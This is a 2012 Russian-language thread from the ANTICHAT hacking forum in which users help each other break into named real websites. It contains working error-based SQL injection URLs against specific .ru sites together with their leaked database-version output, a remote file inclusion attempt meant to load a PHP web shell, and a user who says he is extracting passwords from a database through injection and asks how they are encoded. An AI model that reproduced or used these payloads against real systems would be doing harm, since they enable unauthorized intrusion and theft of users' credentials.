HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19561  
Старый 08.02.2012, 05:46
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

подскажите, при RFI подставляю http://ya.ru/ все норм, грузится яшка, далее подставляю http://site.ru/shell.txt - пустая страница в сорце весь код есть, http://site.ru/shell.php - открывает шелл на моем сайте, что еще можно попробывать??

p.s. когда подгружаю с http://files.xakep.biz/shells/PHP/ одни крокозяблы

при добавлении ? в конец адреса - пустая страница
 
Ответить с цитированием

  #19562  
Старый 08.02.2012, 07:31
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Может просто ифрейм?
 
Ответить с цитированием

  #19563  
Старый 08.02.2012, 19:45
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

что можете сказать или лучше посоветовать?

Код:
Code:
_ww.9_months.ru/vote/24'
Спасибо.
 
Ответить с цитированием

  #19564  
Старый 08.02.2012, 19:55
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от Always  
Always said:
что можете сказать или лучше посоветовать?
Код:
Code:
_ww.9_months.ru/vote/24'
Спасибо.
Ссылку нормально дай.
 
Ответить с цитированием

  #19565  
Старый 08.02.2012, 20:17
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от Always  
Always said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]www.9months[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vote[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR] 
вот версию вывел а дальше хз.

http://www.9months.ru/vote/25-1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'

нужна помощь великих и могучих))

Код:
Code:
Duplicate column name '5.0.86-log'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/9months/data/www/9months.ru/vote.php on line 195
нет такого опроса
 
Ответить с цитированием

  #19566  
Старый 08.02.2012, 20:20
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Немогу вывести инфу через контактацию с ошибком, помогите составить запрос

Цитата:
Сообщение от None  
http://www.dunloptyres.ru/tyre.php?id=3+or+1+group+by+concat%28%28select+ver sion%28%29%29,0x00,floor%28rand%280%29*2%29%29havi ng+min%280%29+or+1--+
 
Ответить с цитированием

  #19567  
Старый 08.02.2012, 20:25
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Немогу вывести инфу через контактацию с ошибком, помогите составить запрос
гы, я тоже с этим сайтом в прошлом парился)))

вот

http://www.dunloptyres.ru/tyre.php?id=3+and(select+count(*)+from+information _schema.tables+group+by(concat(version(),0x00,floo r(rand(0)*2))))--+

Код:
Code:
AND b.id=a.tyre_type_id [nativecode=1062 ** Duplicate entry '5.0.87-community' for key 1]
Array
 
Ответить с цитированием

  #19568  
Старый 08.02.2012, 21:34
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Достаю пассы через скулю с БД, но проблема с кодировкой

пассы на кирилице выглядят дdЭеѓj(¤хW nжnѓ»

как бороться ?
 
Ответить с цитированием

  #19569  
Старый 08.02.2012, 21:47
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

точнее это не с кодировкой проблемы это так пасы шифруються .

Вот пример нескольких паролей

Цитата:
Сообщение от None  
cв§±uКч"‡Bњn
dс\ ґЃJК.я-йј
ЛXЫ l[Ж RЂNяїџъ
ХzWt 9:fЗРЭh.G
У всех по 16 символов , но что это такое ? есть у кого идеи каким макаром оно зашифоровано?
 
Ответить с цитированием

  #19570  
Старый 08.02.2012, 21:47
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от sl1k  
sl1k said:
Достаю пассы через скулю с БД, но проблема с кодировкой
пассы на кирилице выглядят дdЭеѓj(¤хW nжnѓ»
как бороться ?
ascii, hex
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ